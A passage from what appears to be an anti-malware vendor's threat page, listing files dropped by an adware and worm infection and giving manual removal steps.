      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\246.js (8 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\45.js (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\102.js (1 bytes)
      %Program Files%\Ge-Force\background.html (729 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\21.js (3 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\39.js (4 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\35.js (9 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\28.js (536 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\94.js (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W5QGY4W6\337[1].js (407 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\354.js (4992 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\177.js (784 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\4.js (3312 bytes)
      %Program Files%\Ge-Force\Ge-Force-buttonutil.dll (2321 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IHE4VINB\262[1].js (25 bytes)
      %Program Files%\Ge-Force\Ge-Force-codedownloader.exe (7547 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\InstallerUtils.dll (27704 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins.json (15 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\64.js (2 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\345.js (579 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\273.js (905 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\78.js (3 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\37.js (2 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\329201 (141808 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\md5dll.dll (6 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\14.js (784 bytes)
      %Program Files%\Ge-Force\Ge-Force-bho.dll (4545 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\nsisos.dll (5 bytes)
      %Program Files%\Ge-Force\Ge-Force-bg.exe (4185 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\9.js (2 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W5QGY4W6\desktop.ini (67 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\184.js (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\195.js (410 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nseB7.tmp (662466 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W5QGY4W6\356[1].js (407 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\41.js (2 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\2.js (63 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RP80DVHJ\plugins[1].json (4153 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\17.js (2392 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\userCode\extension.js (15 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\13.js (6 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\38.js (2 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RP80DVHJ\350[1].js (25 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\22.js (8 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\42.js (7 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\200.js (809 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GP2JGLQF\manifest[1].xml (25 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\223.js (825 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\220.js (1552 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\System.dll (11 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\286.js (997 bytes)
      %Program Files%\Ge-Force\Uninstall.exe (601 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\67844 (31281 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GP2JGLQF\91[1].js (86817 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\72.js (1552 bytes)
      %WinDir%\Tasks\55b9f9b3-a933-4e78-9f2c-145eb2174f55-5.job (72 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IHE4VINB\desktop.ini (67 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\StdUtils.dll (14 bytes)
      %Program Files%\Ge-Force\Ge-Force-buttonutil.exe (1425 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\183.js (2 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\253.js (737 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GP2JGLQF\desktop.ini (67 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\263.js (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RP80DVHJ\ipgeoapi[1] (39 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GP2JGLQF\193[1].js (867 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\46.js (2 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\manifest.xml (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\207.js (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\44.js (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IHE4VINB\app_code[1].js (2977 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\36.js (784 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RP80DVHJ\desktop.ini (67 bytes)
      %Program Files%\Ge-Force\55b9f9b3-a933-4e78-9f2c-145eb2174f55-5.exe (7726 bytes)
      %WinDir%\system.ini (72 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\vbijkl.exe (741 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp\Khtmovq.exe (4404939 bytes)
      %Program Files%\Common Files\Java\Java Update\jusched.exe (368 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp\StdUtils.dll (14 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\0014C62D_Rar\%original file name%.exe (99596 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp\Kuoyj.tmp (419460 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp\System.dll (11 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp\FacebookIsGod.dll (2426 bytes)

    4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
    5. Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
    6. Reboot the computer.

    *Manual removal may cause unexpected system behaviour and should be performed at your own risk.

    No votes yet


    Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
    © 2026 Lavasoft. All rights reserved.
    Terms Of Use |   Privacy Policy


    x

    Our best antivirus yet!

    Fresh new look. Faster scanning. Better protection.

    Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

    For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

    Download adaware antivirus 12
    No thanks, continue to lavasoft.com
    close x

    Discover the new adaware antivirus 12

    Our best antivirus yet

    Download Now